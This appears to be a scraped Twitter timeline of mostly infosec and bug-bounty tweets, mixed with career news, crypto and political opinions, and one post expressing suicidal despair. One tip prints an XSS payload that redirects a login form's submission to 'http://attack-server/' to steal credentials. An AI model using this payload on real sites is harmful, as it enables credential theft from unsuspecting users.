high tech low life

@Rhynorater @ctbbpodcast People should look for XSLT injection when testing SAML. Could get you RCE.

This just popped up in the @ctbbpodcast discord: Crazy... bugs.chromium.org/p/chromium/iss…

@cooltechrepairs OSCP + Bug Bounties if you're looking at the offensive side.

Really working on becoming a security engineer. What some good steps to look into to land first role ?

@0x30n Last one that comes to mind is kiwifarms

What was the last real world breach caused by XSS? (Not pen test, researcher, bug bounty, etc.)

@hacker_ Exploiting web2 bugs in web3 platforms or what you can share about your general approach to these programs.

@TheDgtalEmpress IDOR'nt blame ya #Carlos!

@win3zz Underrated and unironically common.

Pre-login XSS? Attackers can steal credentials by changing HTML form action: <script>x=document.querySelector('form');x.setAttribute('method','GET');x.setAttribute('action','http://attack-server/');</script> Try it out: pastecode.io/s/8kcjwvn1 #infosec #bugbountytips #XSS

@I_Am_Jakoby Sending you good all the best stuff stranger cut from the same cloth

I pray to god every night and beg that he takes me in my sleep I lost my mom, dad, sister,(dead) girlfriend (gone) and job in the same 45 days Its not reasonably expected that I am supposed to survive this right? There is nothing left to me, im completely dead inside im sorry

@seannalexander @CanBusDutch @flipper_net

@danheld Nothing shitty about what happenned. Honestly bitcoin maxis and convictions are just growing stronger.

Self custody- no compromise Not your keys not your coins

This gotta be a joke huh?? Hov ain’t following me 🤣😂 then I’m the only follower. Elon forgot some of the scam parody pages mann lol

@VV_X_7 @_RastaMouse @zeropointsecltd @0xThylacine This would be really cool! Thank you

@Steph3nSims Great idea! I have experience pentesting web3/blockchain space the last couple years and have plenty to say. Would love to help if possible.

Any interest in a Blockchain and Crypto Security Summit? Would you attend? Would be virtual. Security has been lacking in that space.

Like I said last year, attacking people in their place of worship in a month where they are fasting is the most cowardice thing I've seen in my life. It's time to boycott Israel. #BDS

I GOT THE JOB!!! Former Counselor turned Junior Engineer!!! -Self-taught -No boot camp -Non CS Degree (B.S. in Psychology) -I'm over 30! It's totally possible IF you put in the WORK! Now excuse me while I go cry! 😂 #blacktechtwitter #WomenWhoCode

I HATE JavaScript with all my heart.

@theXSSrat Im also looking for a hacking buddy. Lets do #bugbounties. Down to make a TG group + i can set up an azure devops environment for collaboration.

Tip 1 from your cheesy uncle: Get yourself a hacking buddy!! You need to have SOMEONE to celebrate your victories with, it motivates you! :D <3

@NFTyStays Sounds good friend. Hit my DMs and let's talk more :)

@briebriejoy First time tweeter to yourself, long-time friend of the show! Appreciate you bringing content that makes it a little easier to #KeepTheFaith #BadFaith #BadFaithPodcast